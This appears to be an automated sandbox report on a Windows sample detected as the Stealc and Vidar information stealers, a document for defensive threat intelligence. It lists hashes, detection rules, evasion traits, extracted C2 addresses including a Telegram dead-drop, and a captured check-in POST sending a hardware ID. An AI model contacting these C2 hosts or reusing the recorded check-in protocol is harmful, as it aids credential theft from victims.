Edit tour

Windows Analysis Report
BnxBRWQWhy.exe

Overview

General Information

Sample name:	BnxBRWQWhy.exe renamed because original name is a hash value
Original sample name:	ea6989e3a607d753377b05bae55140d8.exe
Analysis ID:	1525312
MD5:	ea6989e3a607d753377b05bae55140d8
SHA1:	5c67ca11e96875c9beb0d320170e000698a65148
SHA256:	9e857e6656ff0d6da789faa05f9fb49c323bdcea03b0b7887bbac919122f32fb
Tags:	exeStealcuser-abuse_ch
Infos:

Detection

Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Machine Learning detection for sample

PE file has a writeable .text section

Searches for specific processes (likely to inject)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse usering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Extensive use of GetProcAddress (often used to hide API calls)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

Queries the volume information (name, serial number etc) of a device

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

BnxBRWQWhy.exe (PID: 6936 cmdline: "C:\Users\user\Desktop\BnxBRWQWhy.exe" MD5: EA6989E3A607D753377B05BAE55140D8)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://193.233.112.44/383ccd496f3c5eee.php", "Botnet": "soft"}

Threatname: Vidar

{"C2 url": "https://t.me/hwlflcqshvwp/383ccd496f3c5eee.php", "Botnet": "soft"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
BnxBRWQWhy.exe	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
BnxBRWQWhy.exe	JoeSecurity_Stealc	Yara detected Stealc	Joe Security

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000000.2106325851.0000000000731000.00000080.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2158782310.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: BnxBRWQWhy.exe PID: 6936	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: BnxBRWQWhy.exe PID: 6936	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: BnxBRWQWhy.exe PID: 6936	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.BnxBRWQWhy.exe.730000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0.2.BnxBRWQWhy.exe.730000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security

Suricata Signatures

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-04T00:57:00.721287+0200	2044243	1	Malware Command and Control Activity Detected	192.168.2.6	49716	193.233.112.44	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: BnxBRWQWhy.exe

Avira: detected

Found malware configuration

Source: BnxBRWQWhy.exe	Malware Configuration Extractor: Vidar {"C2 url": "https://t.me/hwlflcqshvwp/383ccd496f3c5eee.php", "Botnet": "soft"}
Source: 0.0.BnxBRWQWhy.exe.730000.0.unpack	Malware Configuration Extractor: StealC {"C2 url": "http://193.233.112.44/383ccd496f3c5eee.php", "Botnet": "soft"}

Multi AV Scanner detection for submitted file

Source: BnxBRWQWhy.exe

ReversingLabs: Detection: 50%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for sample

Source: BnxBRWQWhy.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Code function: 0_2_0073C820 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA,	0_2_0073C820
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Code function: 0_2_00737240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_00737240
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Code function: 0_2_00739AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00739AC0
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Code function: 0_2_00748EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	0_2_00748EA0
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Code function: 0_2_00739B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,	0_2_00739B60

Source: BnxBRWQWhy.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49714 version: TLS 1.2

Source: BnxBRWQWhy.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Code function: 0_2_0073E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0073E430
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Code function: 0_2_007438B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_007438B0
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Code function: 0_2_00744570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	0_2_00744570
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Code function: 0_2_0073ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0073ED20
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Code function: 0_2_00744910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00744910
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Code function: 0_2_0073BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0073BE70
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Code function: 0_2_0073DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0073DE10
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Code function: 0_2_007316D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_007316D0
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Code function: 0_2_0073F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0073F6B0
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Code function: 0_2_00743EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	0_2_00743EA0
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Code function: 0_2_0073DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0073DA80

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49716 -> 193.233.112.44:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://193.233.112.44/383ccd496f3c5eee.php
Source: Malware configuration extractor	URLs: https://t.me/hwlflcqshvwp/383ccd496f3c5eee.php

Source: global traffic	HTTP traffic detected: GET /hwlflcqshvwp HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 91.214.78.145Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 193.233.112.44Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /383ccd496f3c5eee.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGDGCFBAEGDHJKEBGCBAHost: 193.233.112.44Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 44 47 43 46 42 41 45 47 44 48 4a 4b 45 42 47 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 31 36 34 43 46 37 31 45 34 43 32 38 31 37 30 31 38 37 30 38 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 47 43 46 42 41 45 47 44 48 4a 4b 45 42 47 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 6f 66 74 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 47 43 46 42 41 45 47 44 48 4a 4b 45 42 47 43 42 41 2d 2d 0d 0a Data Ascii: ------CGDGCFBAEGDHJKEBGCBAContent-Disposition: form-data; name="hwid"86164CF71E4C2817018708------CGDGCFBAEGDHJKEBGCBAContent-Disposition: form-data; name="build"soft------CGDGCFBAEGDHJKEBGCBA--

Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99

Source: Joe Sandbox View	ASN Name: FREE-MPEIRU FREE-MPEIRU
Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	TCP traffic detected without corresponding DNS query: 91.214.78.145
Source: unknown	TCP traffic detected without corresponding DNS query: 91.214.78.145
Source: unknown	TCP traffic detected without corresponding DNS query: 91.214.78.145
Source: unknown	TCP traffic detected without corresponding DNS query: 91.214.78.145
Source: unknown	TCP traffic detected without corresponding DNS query: 91.214.78.145
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.112.44
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.112.44
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.112.44
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.112.44
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.112.44
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.112.44
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.112.44
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\BnxBRWQWhy.exe

Code function: 0_2_00734880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlenA,lstrlenA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_00734880

Source: global traffic	HTTP traffic detected: GET /hwlflcqshvwp HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 91.214.78.145Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 193.233.112.44Connection: Keep-AliveCache-Control: no-cache

Source: global traffic

DNS traffic detected: DNS query: t.me

Source: unknown

HTTP traffic detected: POST /383ccd496f3c5eee.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGDGCFBAEGDHJKEBGCBAHost: 193.233.112.44Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 44 47 43 46 42 41 45 47 44 48 4a 4b 45 42 47 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 31 36 34 43 46 37 31 45 34 43 32 38 31 37 30 31 38 37 30 38 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 47 43 46 42 41 45 47 44 48 4a 4b 45 42 47 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 6f 66 74 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 47 43 46 42 41 45 47 44 48 4a 4b 45 42 47 43 42 41 2d 2d 0d 0a Data Ascii: ------CGDGCFBAEGDHJKEBGCBAContent-Disposition: form-data; name="hwid"86164CF71E4C2817018708------CGDGCFBAEGDHJKEBGCBAContent-Disposition: form-data; name="build"soft------CGDGCFBAEGDHJKEBGCBA--

Source: BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000001024000.00000004.00000020.00020000.00000000.sdmp, BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.233.112.44
Source: BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000001063000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.233.112.44/
Source: BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000001006000.00000004.00000020.00020000.00000000.sdmp, BnxBRWQWhy.exe, 00000000.00000002.2158782310.000000000102F000.00000004.00000020.00020000.00000000.sdmp, BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000001063000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.233.112.44/383ccd496f3c5eee.php
Source: BnxBRWQWhy.exe, 00000000.00000002.2158782310.000000000103C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.233.112.44/383ccd496f3c5eee.php_lw
Source: BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000001063000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.233.112.44/W
Source: BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000001063000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.233.112.44/j
Source: BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000000FF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.233.112.44/tion:
Source: BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.233.112.44Rn
Source: BnxBRWQWhy.exe, 00000000.00000003.2128523908.0000000001035000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.214.78.145
Source: BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000001024000.00000004.00000020.00020000.00000000.sdmp, BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000001063000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.214.78.145/
Source: BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000001063000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.214.78.145/5
Source: BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000001063000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.214.78.145/x
Source: BnxBRWQWhy.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: BnxBRWQWhy.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: BnxBRWQWhy.exe	String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
Source: BnxBRWQWhy.exe	String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
Source: BnxBRWQWhy.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: BnxBRWQWhy.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: BnxBRWQWhy.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: BnxBRWQWhy.exe	String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
Source: BnxBRWQWhy.exe	String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
Source: BnxBRWQWhy.exe	String found in binary or memory: http://ocsp.digicert.com0
Source: BnxBRWQWhy.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: BnxBRWQWhy.exe	String found in binary or memory: http://ocsp.sectigo.com0
Source: BnxBRWQWhy.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: BnxBRWQWhy.exe	String found in binary or memory: https://sectigo.com/CPS0
Source: BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000001006000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/
Source: BnxBRWQWhy.exe, 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmp, BnxBRWQWhy.exe, 00000000.00000003.2128523908.0000000001043000.00000004.00000020.00020000.00000000.sdmp, BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000001006000.00000004.00000020.00020000.00000000.sdmp, BnxBRWQWhy.exe, 00000000.00000002.2158782310.000000000102F000.00000004.00000020.00020000.00000000.sdmp, BnxBRWQWhy.exe, 00000000.00000003.2128523908.0000000001035000.00000004.00000020.00020000.00000000.sdmp, BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/hwlflcqshvwp
Source: BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/hwlflcqshvwps
Source: BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000001081000.00000004.00000020.00020000.00000000.sdmp, BnxBRWQWhy.exe, 00000000.00000002.2158782310.000000000102F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.org

Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714

Source: unknown

HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49714 version: TLS 1.2

System Summary

PE file has a writeable .text section

Source: BnxBRWQWhy.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Users\user\Desktop\BnxBRWQWhy.exe

Code function: String function: 007345C0 appears 318 times

Source: BnxBRWQWhy.exe

Static PE information: invalid certificate

Source: BnxBRWQWhy.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/0@1/3

Source: C:\Users\user\Desktop\BnxBRWQWhy.exe

Code function: 0_2_00749600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00749600

Source: C:\Users\user\Desktop\BnxBRWQWhy.exe

Code function: 0_2_00743720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_00743720

Source: C:\Users\user\Desktop\BnxBRWQWhy.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\TTDMFW94.htm

Jump to behavior

Source: BnxBRWQWhy.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Users\user\Desktop\BnxBRWQWhy.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: BnxBRWQWhy.exe

ReversingLabs: Detection: 50%

Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Section loaded: ncryptsslp.dll	Jump to behavior

Source: C:\Users\user\Desktop\BnxBRWQWhy.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: BnxBRWQWhy.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\BnxBRWQWhy.exe

Code function: 0_2_00749860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00749860

Source: BnxBRWQWhy.exe

Static PE information: real checksum: 0x54250 should be: 0x52de9

Source: C:\Users\user\Desktop\BnxBRWQWhy.exe

Code function: 0_2_0074B035 push ecx; ret

0_2_0074B048

Source: C:\Users\user\Desktop\BnxBRWQWhy.exe

0_2_00749860

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\BnxBRWQWhy.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_0-12416

Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Code function: 0_2_0073E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0073E430
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Code function: 0_2_007438B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_007438B0
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Code function: 0_2_00744570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	0_2_00744570
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Code function: 0_2_0073ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0073ED20
